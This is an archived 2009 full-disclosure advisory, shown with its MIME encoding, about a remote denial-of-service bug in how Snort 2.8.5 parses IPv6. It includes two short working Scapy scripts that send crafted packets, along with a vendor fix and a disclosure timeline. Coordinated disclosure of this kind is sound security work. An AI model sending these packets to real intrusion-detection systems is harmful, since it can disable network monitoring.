Snort Bug in Monitoring IPv6 Data Lets Remote Users Deny Service

--===============1176830778==
Content-Type: multipart/alternative; boundary=001636c5be6c4798ea04768d2ca2

--001636c5be6c4798ea04768d2ca2
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
- Date: October 22th, 2009
- Discovered by: Laurent Gaffi=E9
- Severity: Low
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

I. VULNERABILITY
-------------------------
Snort <=3D 2.8.5 IPV6 Remote DoS


II. DESCRIPTION
-------------------------
A remote DoS was present in Snort 2.8.5 when parsing some specialy IPv6
crafted packet
To trigger theses bugs you need to have compiled snort with the
--enable-ipv6 option, and run it in verbose mode (-v)

III. PROOF OF CONCEPT
-------------------------
You can reproduce theses two differents bugs easily by using the Python
low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1) #only works on x86

#/usr/bin/env python
from scapy.all import *
u =3D "\x92"+"\x02" * 6
send(IPv6(dst=3D"IPv6_addr_here", nh=3D6)/u) #nh6 -> TCP

2) # works x86,x64

#/usr/bin/env python
from scapy.all import *

z =3D "Q" * 30
send(IPv6(dst=3D"IPv6_ADDR_HERE",nh=3D1)/ICMPv6NIQueryNOOP(type=3D4)/z) #nh=
1 ->
icmp (not v6)


IV. SYSTEMS AFFECTED
-------------------------
Theses proof of concept as been tested on snort:
- 2.8.5

V. NOT AFFECTED
-------------------------
Sourcefire 3D Sensor


VI. SOLUTION
-------------------------
A new version correcting theses issues as been released (2.8.5.1) :

http://www.snort.org/downloads


VII. REFERENCES
-------------------------
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/

VIII. REVISION HISTORY
-------------------------
October 14th, 2009: First issue discovered, advisory send to snort team.
October 14th, 2009: Snort security team confirm the bug.
October 16th, 2009: Second issue discovered, advisory send to snort team.
October 20th, 2009: Snort security team confirm the bug.
October 22th, 2009: Snort team released a new version.


IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffi=E9
Laurent.gaffie{remove-this}(at)gmail.com

--001636c5be6c4798ea04768d2ca2
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>- Date: Oct=
ober 22th, 2009<br>- Discovered by: Laurent Gaffi=E9<br>- Severity: Low<br>=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>I. VULN=
ERABILITY<br>-------------------------<br>
Snort &lt;=3D 2.8.5 IPV6 Remote DoS<br><br><br>II. DESCRIPTION<br>---------=
----------------<br>A remote DoS was present in Snort 2.8.5 when parsing so=
me specialy IPv6 crafted packet<br>To trigger theses bugs you need to have =
compiled snort with the --enable-ipv6 option, and run it in verbose mode (-=
v)<br>
<br>III. PROOF OF CONCEPT<br>-------------------------<br>You can reproduce=
 theses two differents bugs easily by using the Python low-level networking=
 lib Scapy<br>(<a href=3D"http://www.secdev.org/projects/scapy/files/scapy-=
latest.zip">http://www.secdev.org/projects/scapy/files/scapy-latest.zip</a>=
)<br>
<br>1) #only works on x86<br><br>#/usr/bin/env python<br>from scapy.all imp=
ort *<br>u =3D &quot;\x92&quot;+&quot;\x02&quot; * 6<br>send(IPv6(dst=3D&qu=
ot;IPv6_addr_here&quot;, nh=3D6)/u) #nh6 -&gt; TCP<br><br>2) # works x86,x6=
4<br>
<br>#/usr/bin/env python<br>from scapy.all import *<br><br>z =3D &quot;Q&qu=
ot; * 30<br>send(IPv6(dst=3D&quot;IPv6_ADDR_HERE&quot;,nh=3D1)/ICMPv6NIQuer=
yNOOP(type=3D4)/z) #nh1 -&gt; icmp (not v6)<br><br><br>IV. SYSTEMS AFFECTED=
<br>
-------------------------<br>Theses proof of concept as been tested on snor=
t:<br>- 2.8.5<br><br>V. NOT AFFECTED<br>-------------------------<br>Source=
fire 3D Sensor<br><br><br>VI. SOLUTION<br>-------------------------<br>
A new version correcting theses issues as been released (2.8.5.1) :<br><br>=
<a href=3D"http://www.snort.org/downloads">http://www.snort.org/downloads</=
a><br><br><br>VII. REFERENCES<br>-------------------------<br><a href=3D"ht=
tp://www.snort.org/">http://www.snort.org/</a><br>
<a href=3D"http://vrt-sourcefire.blogspot.com/">http://vrt-sourcefire.blogs=
pot.com/</a><br><br>VIII. REVISION HISTORY<br>-------------------------<br>=
October 14th, 2009: First issue discovered, advisory send to snort team.<br=
>
October 14th, 2009: Snort security team confirm the bug.<br>October 16th, 2=
009: Second issue discovered, advisory send to snort team.<br>October 20th,=
 2009: Snort security team confirm the bug.<br>October 22th, 2009: Snort te=
am released a new version.<br>
<br><br>IX. CREDITS<br>-------------------------<br>This vulnerability has =
been discovered by Laurent Gaffi=E9<br>Laurent.gaffie{remove-this}(at)<a hr=
ef=3D"http://gmail.com">gmail.com</a> <br>

--001636c5be6c4798ea04768d2ca2--


--===============1176830778==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1176830778==--

Go to the Top of This SecurityTracker Archive Page